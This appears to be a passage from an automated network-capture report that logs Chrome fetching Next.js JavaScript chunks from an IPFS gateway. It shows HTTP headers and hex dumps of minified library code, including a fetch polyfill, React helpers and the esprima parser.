                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 45 61 63 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 74 68 69 73 2e 6d 61 70 29 74 68 69 73 2e 6d 61 70 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6e 29 26 26 65 2e 63 61 6c 6c 28 74 2c 74 68 69 73 2e 6d 61 70 5b 6e 5d 2c 6e 2c 74 68 69 73 29 7d 2c 70 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 5b 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 65 2e 70 75 73 68 28 6e 29 7d 29 29 2c 68 28 65 29 7d 2c 70 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 5b 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74
                                                                                                                                                                                                                                                  Data Ascii: Each=function(e,t){for(var n in this.map)this.map.hasOwnProperty(n)&&e.call(t,this.map[n],n,this)},p.prototype.keys=function(){var e=[];return this.forEach((function(t,n){e.push(n)})),h(e)},p.prototype.values=function(){var e=[];return this.forEach((funct
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 3d 6e 2e 73 68 69 66 74 28 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2b 2f 67 2c 22 20 22 29 2c 72 3d 6e 2e 6a 6f 69 6e 28 22 3d 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2b 2f 67 2c 22 20 22 29 3b 74 2e 61 70 70 65 6e 64 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 69 29 2c 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 72 29 29 7d 7d 29 29 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 49 28 65 29 7b 76 61 72 20 74 3d 6e 65 77 20 70 3b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 5c 72 3f 5c 6e 5b 5c 74 20 5d 2b 2f 67 2c 22 20 22 29 2e 73 70 6c 69 74 28 2f 5c 72 3f 5c 6e 2f 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 73 70 6c 69 74 28 22 3a 22 29 2c 69 3d 6e 2e 73 68 69 66 74 28 29 2e 74 72
                                                                                                                                                                                                                                                  Data Ascii: =n.shift().replace(/\+/g," "),r=n.join("=").replace(/\+/g," ");t.append(decodeURIComponent(i),decodeURIComponent(r))}})),t}function I(e){var t=new p;return e.replace(/\r?\n[\t ]+/g," ").split(/\r?\n/).forEach((function(e){var n=e.split(":"),i=n.shift().tr
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 73 65 28 28 66 75 6e 63 74 69 6f 6e 28 69 2c 73 29 7b 76 61 72 20 6f 3d 6e 65 77 20 54 28 65 2c 6e 29 3b 69 66 28 6f 2e 73 69 67 6e 61 6c 26 26 6f 2e 73 69 67 6e 61 6c 2e 61 62 6f 72 74 65 64 29 72 65 74 75 72 6e 20 73 28 6e 65 77 20 74 2e 44 4f 4d 45 78 63 65 70 74 69 6f 6e 28 22 41 62 6f 72 74 65 64 22 2c 22 41 62 6f 72 74 45 72 72 6f 72 22 29 29 3b 76 61 72 20 61 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 3b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 61 2e 61 62 6f 72 74 28 29 7d 61 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 73 74 61 74 75 73 3a 61 2e 73 74 61 74 75 73 2c 73 74 61 74 75 73 54 65 78 74 3a 61 2e 73 74 61 74 75 73 54 65 78 74 2c 68 65 61 64 65 72 73 3a 49 28 61 2e 67 65 74 41 6c 6c 52 65 73 70
                                                                                                                                                                                                                                                  Data Ascii: se((function(i,s){var o=new T(e,n);if(o.signal&&o.signal.aborted)return s(new t.DOMException("Aborted","AbortError"));var a=new XMLHttpRequest;function c(){a.abort()}a.onload=function(){var e={status:a.status,statusText:a.statusText,headers:I(a.getAllResp
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 65 2e 65 78 70 6f 72 74 73 3d 74 7d 2c 33 33 37 34 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 69 3d 6e 28 36 37 32 39 34 29 3b 63 6f 6e 73 74 20 72 3d 69 2e 66 6f 72 77 61 72 64 52 65 66 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 76 67 22 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 30 20 32 30 22 2c 66 69 6c 6c 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 72 65 66 3a 74 7d 2c 65 29 2c 69 2e 63 72 65 61
                                                                                                                                                                                                                                                  Data Ascii: e.exports=t},33740:function(e,t,n){"use strict";var i=n(67294);const r=i.forwardRef((function(e,t){return i.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20",fill:"currentColor","aria-hidden":"true",ref:t},e),i.crea
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 6f 72 52 65 73 65 74 42 6f 75 6e 64 61 72 79 3a 70 2c 75 73 65 45 72 72 6f 72 42 6f 75 6e 64 61 72 79 3a 64 2e 75 73 65 45 72 72 6f 72 42 6f 75 6e 64 61 72 79 2c 71 75 65 72 79 3a 66 2e 67 65 74 43 75 72 72 65 6e 74 51 75 65 72 79 28 29 7d 29 29 74 68 72 6f 77 20 79 2e 65 72 72 6f 72 3b 72 65 74 75 72 6e 20 64 2e 6e 6f 74 69 66 79 4f 6e 43 68 61 6e 67 65 50 72 6f 70 73 3f 79 3a 66 2e 74 72 61 63 6b 52 65 73 75 6c 74 28 79 29 7d 7d 2c 35 39 34 30 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 4e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 3b 76 61 72 20 69 3d 6e 28 35 32 39 32 34 29 2c 72 3d 6e 28 39 34 39 39 29 3b 63 6c 61 73 73 20 73 20 65 78 74 65 6e 64 73 20 69
                                                                                                                                                                                                                                                  Data Ascii: orResetBoundary:p,useErrorBoundary:d.useErrorBoundary,query:f.getCurrentQuery()}))throw y.error;return d.notifyOnChangeProps?y:f.trackResult(y)}},59403:function(e,t,n){"use strict";n.d(t,{N:function(){return c}});var i=n(52924),r=n(9499);class s extends i
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 6e 28 37 36 38 37 29 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 2c 6e 29 7b 63 6f 6e 73 74 20 69 3d 28 30 2c 6f 2e 5f 76 29 28 65 2c 74 2c 6e 29 3b 72 65 74 75 72 6e 28 30 2c 61 2e 72 29 28 69 2c 73 29 7d 7d 2c 33 36 34 39 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 3b 76 61 72 20 69 3d 6e 28 33 32 31 36 31 29 2c 72 3d 6e 28 35 32 39 32 34 29 2c 73 3d 6e 28 37 36 38 37 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 2c 6e 29 7b 63 6f 6e 73 74 20 6f 3d 28 30 2c 69 2e 5f 76 29 28 65 2c 74 2c 6e 29 3b 72 65 74 75 72 6e 28 30 2c 73 2e 72 29 28 6f 2c 72 2e 7a 29 7d 7d 2c 38 30 31 30 38 3a 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                                                                  Data Ascii: n(7687);function c(e,t,n){const i=(0,o._v)(e,t,n);return(0,a.r)(i,s)}},36492:function(e,t,n){"use strict";n.d(t,{a:function(){return o}});var i=n(32161),r=n(52924),s=n(7687);function o(e,t,n){const o=(0,i._v)(e,t,n);return(0,s.r)(o,r.z)}},80108:function(e


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  125192.168.2.549853209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:58 UTC508OUTGET /_next/static/chunks/9f96d65d-7b812644c8c0f1f1.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1365INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:58 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 135526
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreidxm67js666untmhrkh2bukbwirkmedsnrkycne3fpo52vwfic6u4"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/9f96d65d-7b812644c8c0f1f1.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreidxm67js666untmhrkh2bukbwirkmedsnrkycne3fpo52vwfic6u4
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13026989
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 37 64 39 65 63 30 63 33 35 66 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e47d9ec0c35f-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 31 34 36 5d 2c 7b 33 31 30 37 32 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 69 28 73 29 7b 69 66 28 74 5b 73 5d 29 72 65 74 75 72 6e 20 74 5b 73 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 73 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 2c 69 64 3a 73 2c 6c 6f 61 64 65 64 3a 21 31 7d 3b 72 65 74 75 72 6e 20 65 5b 73 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 69 29 2c 72 2e 6c
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6146],{31072:function(e){var t;t=function(){return function(e){var t={};function i(s){if(t[s])return t[s].exports;var r=t[s]={exports:{},id:s,loaded:!1};return e[s].call(r.exports,r,r.exports,i),r.l
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 61 6e 64 6c 65 72 2e 74 6f 6c 65 72 61 6e 74 26 26 28 73 2e 65 72 72 6f 72 73 3d 72 2e 65 72 72 6f 72 73 28 29 29 2c 73 7d 3b 76 61 72 20 75 3d 69 28 32 29 3b 74 2e 53 79 6e 74 61 78 3d 75 2e 53 79 6e 74 61 78 2c 74 2e 76 65 72 73 69 6f 6e 3d 22 34 2e 30 2e 31 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 3b 76 61 72 20 73 3d 69 28 32 29 2c 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 74 68 69 73 2e 61 74 74 61 63 68 3d 21 31 2c 74 68 69 73 2e 63 6f 6d 6d 65 6e 74 73 3d 5b 5d 2c 74 68 69 73 2e 73 74 61 63 6b 3d 5b 5d 2c 74 68 69 73
                                                                                                                                                                                                                                                  Data Ascii: andler.tolerant&&(s.errors=r.errors()),s};var u=i(2);t.Syntax=u.Syntax,t.version="4.0.1"},function(e,t,i){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var s=i(2),r=function(){function e(){this.attach=!1,this.comments=[],this.stack=[],this
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 65 61 64 69 6e 67 43 6f 6d 6d 65 6e 74 73 26 26 30 3d 3d 3d 74 2e 6c 65 61 64 69 6e 67 43 6f 6d 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 74 2e 6c 65 61 64 69 6e 67 43 6f 6d 6d 65 6e 74 73 2c 69 7d 66 6f 72 28 73 3d 74 68 69 73 2e 6c 65 61 64 69 6e 67 2e 6c 65 6e 67 74 68 2d 31 3b 73 3e 3d 30 3b 2d 2d 73 29 7b 76 61 72 20 6e 3b 28 6e 3d 74 68 69 73 2e 6c 65 61 64 69 6e 67 5b 73 5d 29 2e 73 74 61 72 74 3c 3d 65 2e 73 74 61 72 74 2e 6f 66 66 73 65 74 26 26 28 69 2e 75 6e 73 68 69 66 74 28 6e 2e 63 6f 6d 6d 65 6e 74 29 2c 74 68 69 73 2e 6c 65 61 64 69 6e 67 2e 73 70 6c 69 63 65 28 73 2c 31 29 29 7d 72 65 74 75 72 6e 20 69 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 76 69 73 69 74 4e 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69
                                                                                                                                                                                                                                                  Data Ascii: eadingComments&&0===t.leadingComments.length&&delete t.leadingComments,i}for(s=this.leading.length-1;s>=0;--s){var n;(n=this.leading[s]).start<=e.start.offset&&(i.unshift(n.comment),this.leading.splice(s,1))}return i},e.prototype.visitNode=function(e,t){i
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 6d 65 6e 74 3a 22 42 6c 6f 63 6b 53 74 61 74 65 6d 65 6e 74 22 2c 42 69 6e 61 72 79 45 78 70 72 65 73 73 69 6f 6e 3a 22 42 69 6e 61 72 79 45 78 70 72 65 73 73 69 6f 6e 22 2c 42 72 65 61 6b 53 74 61 74 65 6d 65 6e 74 3a 22 42 72 65 61 6b 53 74 61 74 65 6d 65 6e 74 22 2c 43 61 6c 6c 45 78 70 72 65 73 73 69 6f 6e 3a 22 43 61 6c 6c 45 78 70 72 65 73 73 69 6f 6e 22 2c 43 61 74 63 68 43 6c 61 75 73 65 3a 22 43 61 74 63 68 43 6c 61 75 73 65 22 2c 43 6c 61 73 73 42 6f 64 79 3a 22 43 6c 61 73 73 42 6f 64 79 22 2c 43 6c 61 73 73 44 65 63 6c 61 72 61 74 69 6f 6e 3a 22 43 6c 61 73 73 44 65 63 6c 61 72 61 74 69 6f 6e 22 2c 43 6c 61 73 73 45 78 70 72 65 73 73 69 6f 6e 3a 22 43 6c 61 73 73 45 78 70 72 65 73 73 69 6f 6e 22 2c 43 6f 6e 64 69 74 69 6f 6e 61 6c 45 78 70 72
                                                                                                                                                                                                                                                  Data Ascii: ment:"BlockStatement",BinaryExpression:"BinaryExpression",BreakStatement:"BreakStatement",CallExpression:"CallExpression",CatchClause:"CatchClause",ClassBody:"ClassBody",ClassDeclaration:"ClassDeclaration",ClassExpression:"ClassExpression",ConditionalExpr
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 79 22 2c 52 65 73 74 45 6c 65 6d 65 6e 74 3a 22 52 65 73 74 45 6c 65 6d 65 6e 74 22 2c 52 65 74 75 72 6e 53 74 61 74 65 6d 65 6e 74 3a 22 52 65 74 75 72 6e 53 74 61 74 65 6d 65 6e 74 22 2c 53 65 71 75 65 6e 63 65 45 78 70 72 65 73 73 69 6f 6e 3a 22 53 65 71 75 65 6e 63 65 45 78 70 72 65 73 73 69 6f 6e 22 2c 53 70 72 65 61 64 45 6c 65 6d 65 6e 74 3a 22 53 70 72 65 61 64 45 6c 65 6d 65 6e 74 22 2c 53 75 70 65 72 3a 22 53 75 70 65 72 22 2c 53 77 69 74 63 68 43 61 73 65 3a 22 53 77 69 74 63 68 43 61 73 65 22 2c 53 77 69 74 63 68 53 74 61 74 65 6d 65 6e 74 3a 22 53 77 69 74 63 68 53 74 61 74 65 6d 65 6e 74 22 2c 54 61 67 67 65 64 54 65 6d 70 6c 61 74 65 45 78 70 72 65 73 73 69 6f 6e 3a 22 54 61 67 67 65 64 54 65 6d 70 6c 61 74 65 45 78 70 72 65 73 73 69 6f 6e
                                                                                                                                                                                                                                                  Data Ascii: y",RestElement:"RestElement",ReturnStatement:"ReturnStatement",SequenceExpression:"SequenceExpression",SpreadElement:"SpreadElement",Super:"Super",SwitchCase:"SwitchCase",SwitchStatement:"SwitchStatement",TaggedTemplateExpression:"TaggedTemplateExpression
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 72 6e 20 74 7d 68 2e 54 6f 6b 65 6e 4e 61 6d 65 5b 31 30 30 5d 3d 22 4a 53 58 49 64 65 6e 74 69 66 69 65 72 22 2c 68 2e 54 6f 6b 65 6e 4e 61 6d 65 5b 31 30 31 5d 3d 22 4a 53 58 54 65 78 74 22 3b 76 61 72 20 70 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 69 2c 73 29 7b 72 65 74 75 72 6e 20 65 2e 63 61 6c 6c 28 74 68 69 73 2c 74 2c 69 2c 73 29 7c 7c 74 68 69 73 7d 72 65 74 75 72 6e 20 73 28 74 2c 65 29 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 70 61 72 73 65 50 72 69 6d 61 72 79 45 78 70 72 65 73 73 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 61 74 63 68 28 22 3c 22 29 3f 74 68 69 73 2e 70 61 72 73 65 4a 53 58 52 6f 6f 74 28 29 3a 65 2e 70 72 6f 74 6f 74 79 70 65 2e 70 61 72 73 65 50 72
                                                                                                                                                                                                                                                  Data Ascii: rn t}h.TokenName[100]="JSXIdentifier",h.TokenName[101]="JSXText";var p=function(e){function t(t,i,s){return e.call(this,t,i,s)||this}return s(t,e),t.prototype.parsePrimaryExpression=function(){return this.match("<")?this.parseJSXRoot():e.prototype.parsePr
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 43 68 61 72 61 63 74 65 72 2e 69 73 48 65 78 44 69 67 69 74 28 6f 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 29 29 7d 7d 69 66 28 69 26 26 73 26 26 74 2e 6c 65 6e 67 74 68 3e 32 29 7b 76 61 72 20 75 3d 74 2e 73 75 62 73 74 72 28 31 2c 74 2e 6c 65 6e 67 74 68 2d 32 29 3b 6e 26 26 75 2e 6c 65 6e 67 74 68 3e 31 3f 74 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 70 61 72 73 65 49 6e 74 28 75 2e 73 75 62 73 74 72 28 31 29 2c 31 30 29 29 3a 61 26 26 75 2e 6c 65 6e 67 74 68 3e 32 3f 74 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 70 61 72 73 65 49 6e 74 28 22 30 22 2b 75 2e 73 75 62 73 74 72 28 31 29 2c 31 36 29 29 3a 6e 7c 7c 61 7c 7c 21 63 2e 58 48 54 4d 4c 45 6e 74 69 74 69 65 73 5b 75 5d 7c 7c 28 74 3d 63 2e 58 48 54 4d 4c
                                                                                                                                                                                                                                                  Data Ascii: Character.isHexDigit(o.charCodeAt(0)))}}if(i&&s&&t.length>2){var u=t.substr(1,t.length-2);n&&u.length>1?t=String.fromCharCode(parseInt(u.substr(1),10)):a&&u.length>2?t=String.fromCharCode(parseInt("0"+u.substr(1),16)):n||a||!c.XHTMLEntities[u]||(t=c.XHTML
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 69 6e 64 65 78 2c 65 6e 64 3a 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 69 6e 64 65 78 7d 3b 69 66 28 72 2e 43 68 61 72 61 63 74 65 72 2e 69 73 49 64 65 6e 74 69 66 69 65 72 53 74 61 72 74 28 65 29 26 26 39 32 21 3d 3d 65 29 7b 66 6f 72 28 74 3d 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 69 6e 64 65 78 2c 2b 2b 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 69 6e 64 65 78 3b 21 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 65 6f 66 28 29 3b 29 7b 76 61 72 20 75 3d 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 73 6f 75 72 63 65 2e 63 68 61 72 43 6f 64 65 41 74 28 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 69 6e 64 65 78 29 3b 69 66 28 72 2e 43 68 61 72 61 63 74 65 72 2e 69 73 49 64 65 6e 74 69 66 69 65 72 50 61 72 74 28 75 29 26 26 39 32 21 3d 3d 75
                                                                                                                                                                                                                                                  Data Ascii: this.scanner.index,end:this.scanner.index};if(r.Character.isIdentifierStart(e)&&92!==e){for(t=this.scanner.index,++this.scanner.index;!this.scanner.eof();){var u=this.scanner.source.charCodeAt(this.scanner.index);if(r.Character.isIdentifierPart(u)&&92!==u
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 63 61 6e 6e 65 72 2e 6c 69 6e 65 4e 75 6d 62 65 72 2c 22 5c 72 22 3d 3d 3d 69 26 26 22 5c 6e 22 3d 3d 3d 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 73 6f 75 72 63 65 5b 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 69 6e 64 65 78 5d 26 26 2b 2b 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 69 6e 64 65 78 2c 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 6c 69 6e 65 53 74 61 72 74 3d 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 69 6e 64 65 78 29 7d 74 68 69 73 2e 6c 61 73 74 4d 61 72 6b 65 72 2e 69 6e 64 65 78 3d 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 69 6e 64 65 78 2c 74 68 69 73 2e 6c 61 73 74 4d 61 72 6b 65 72 2e 6c 69 6e 65 3d 74 68 69 73 2e 73 63 61 6e 6e 65 72 2e 6c 69 6e 65 4e 75 6d 62 65 72 2c 74 68 69 73 2e 6c 61 73 74 4d 61 72 6b 65 72 2e 63 6f 6c 75 6d 6e 3d 74 68 69 73 2e 73
                                                                                                                                                                                                                                                  Data Ascii: canner.lineNumber,"\r"===i&&"\n"===this.scanner.source[this.scanner.index]&&++this.scanner.index,this.scanner.lineStart=this.scanner.index)}this.lastMarker.index=this.scanner.index,this.lastMarker.line=this.scanner.lineNumber,this.lastMarker.column=this.s


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  126192.168.2.549851209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:58 UTC504OUTGET /_next/static/chunks/4609-45f4815a9c085248.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:58 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 9409
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
